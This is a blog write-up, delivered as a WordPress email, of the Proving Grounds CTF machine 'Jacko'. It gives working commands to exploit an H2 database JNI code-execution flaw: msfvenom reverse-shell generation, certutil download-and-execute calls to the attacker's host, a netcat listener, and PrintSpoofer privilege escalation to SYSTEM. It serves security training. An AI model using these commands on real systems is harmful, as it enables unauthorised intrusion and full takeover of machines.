[New post] Proving Grounds – Jacko Write-up

shakuganz posted: " Hi everyone! Today's write-up is on Jacko, a 20 points Windows machine on Proving Grounds. H2 version 1.4.99 has a JNI Code Execution vulnerability that allows us to transfer a Windows reverse shell to gain access to the machine. SeImpersonatePrivilege " Respond to this post by replying above this line New post on Shakugan Proving Grounds – Jacko Write-up by shakuganz Hi everyone! Today's write-up is on Jacko, a 20 points Windows machine on Proving Grounds. H2 version 1.4.99 has a JNI Code Execution vulnerability that allows us to transfer a Windows reverse shell to gain access to the machine. SeImpersonatePrivilege is enabled which can be used to privilege escalation (PE). Let's get started! Nmap enumeration kali@kali:~$ sudo nmap -sC -sV -p- 192.168.54.66 Password: Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-30 01:33 EDT Nmap scan report for 192.168.54.66 Host is up (0.00026s latency). Not shown: 65529 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: H2 Database Engine (redirect) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 7680/tcp open pando-pub? 8082/tcp open http H2 database http console |_http-title: H2 Console MAC Address: 00:50:56:BF:67:10 (VMware) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required Web enumeration At port 8082 When accessing http://192.168.54.66:8082: After clicking on the "Connect" button without entering any password: We can see that it is actually H2 version 1.4.199. If we search online, we can find a JNI code execution vulnerability for it: https://www.exploit-db.com/exploits/49384 Testing the exploit I copied and paste the exploit (had to switch to using my own Kali as Proving Grounds'sbrowser Kali restricts the number of words allowed to copy and paste). There are a total of 5 SQL queries which the 5th query is the query that allows us to execute remote commands. Click on the "Run" button and we can see "whoami" gets executed. Access machine Generate win reverse shell MSFVenom is used to generate a reverse shell. Besides that, we will also need to launch an HTTP service to host it by using Python3. Note that only port 445 is allowed as some firewall setting or something is blocking the other ports. There maybe be other ports allowed but I did not try. Port 22, 443, and 8080 were tested but they were blocked. kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.78 LPORT=445 -f exe > winshell.exe kali@kali:~$ sudo python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... Setup reverse shell listener Netcat is used to listen at port 445 for the coming reverse shell connection. kali@kali:~$ sudo nc -lvnp 445 listening on [any] 443 ... Obtain reverse shell Using the Remote Code Execution (RCE), transfer winshell.exe to the machine and execute it. Input the following and press the "Run" button. CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.49.78/winshell.exe C:\\Users\\Tony\\Documents\\winshell.exe").getInputStream()).useDelimiter("\\Z").next()'); CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c C:\\Users\\Tony\\Documents\\winshell.exe").getInputStream()).useDelimiter("\\Z").next()'); Your Netcat should obtain a reverse shell. listening on [any] 445 ... connect to [192.168.49.78] from (UNKNOWN) [192.168.78.66] 49787 Microsoft Windows [Version 10.0.18363.836] (c) 2019 Microsoft Corporation. All rights reserved. C:\Program Files (x86)\H2\service> Obtain local.txt flag C:\Program Files (x86)\H2\service>type C:\Users\Tony\Desktop\local.txt 88a************************** Privilege escalation Checking privileges The full path must be specified to "whoami" command as the environmental variable PATH did not include "C"\Windows\System32". C:\Program Files (x86)\H2\service>PATH PATH=C:\Users\tony\AppData\Local\Microsoft\WindowsApps; C:\Program Files (x86)\H2\service>C:\Windows\System32\whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled Since SeImpersonatePrivilege is enabled, we can use PrintSpoofer: https://github.com/itm4n/PrintSpoofer Download, transfer and execute PrintSpoofer In your Kali, download PrintSpoofer: kali@kali:~$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe In the reverse shell, transfer PrintSpoofer and run it: C:\Program Files (x86)\H2\service>C:\Windows\system32\certutil.exe -urlcache -f http://192.168.49.78/PrintSpoofer32.exe C:\Users\Tony\Documents\PrintSpoofer32.exe ... C:\Program Files (x86)\H2\service>C:\Users\Tony\Documents\PrintSpoofer32.exe -i -c cmd [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK Microsoft Windows [Version 10.0.18363.836] (c) 2019 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32> Obtain proof.txt flag C:\Windows\system32>cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is AC2F-6399 Directory of C:\Users\Administrator\Desktop 07/09/2020 12:10 PM <DIR> . 07/09/2020 12:10 PM <DIR> .. 04/27/2020 09:11 PM 1,450 Microsoft Edge.lnk 10/30/2021 08:51 PM 34 proof.txt 2 File(s) 1,484 bytes 2 Dir(s) 6,955,769,856 bytes free C:\Users\Administrator\Desktop>type proof.txt de6************************** I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. This post is ad-supported ​ shakuganz | October 31, 2021 at 2:29 pm | Tags: Capture-the-flag, CTF, CTF Write-up, CVE, Cyber, Cyber security, H2, Jacko, msfvenom, PE, PG, PrintSpoofer, Privilege escalation, Proving Grounds, RCE, Security, SMB, SSH, Web, Windows, Write-up | Categories: CTF, CVE, Cyber | URL: https://wp.me/p9KTg5-14Y Comment    See all comments    Like Unsubscribe to no longer receive posts from Shakugan. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: http://shakuganz.com/2021/10/31/proving-grounds-jacko-write-up/ Thanks for flying with WordPress.com